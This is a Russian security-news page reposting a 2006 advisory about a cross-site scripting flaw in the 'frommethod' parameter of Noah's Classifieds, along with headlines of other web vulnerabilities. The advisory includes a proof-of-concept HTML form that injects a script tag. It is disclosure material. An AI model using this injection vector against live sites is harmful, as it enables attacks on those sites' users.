Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities

  [email protected] <= 3.1.9e (naboard_pnr.
php) Remote File Include Vulnerability

  Exploits Minichat v6 Remote File Include

  SH-News (RFI)

From:raphael.huck_(at)_free.fr <raphael.huck_(at)_free.fr>
Date:12 октября 2006 г.
Subject:Noah's Classifieds Cross Site Scripting Vulnerability

Noah's Classifieds is prone to a Cross Site Scripting Vulnerability, due to a failure in the application to properly sanitize the "frommethod" POST parameter in "index.php" :

<html>
<body>

<form method="POST" enctype="multipart/form-data" action="http://www.example.com/classifieds/index.php">

<input type="hidden" name="fromlist" value="advertisement">
<input type="hidden" name="frommethod" value="'><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Cancel" name="submit" class="button">

</form>

</body>
</html>

Advisory: http://zone14.free.fr/advisories/5/

--Raphael HUCK

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород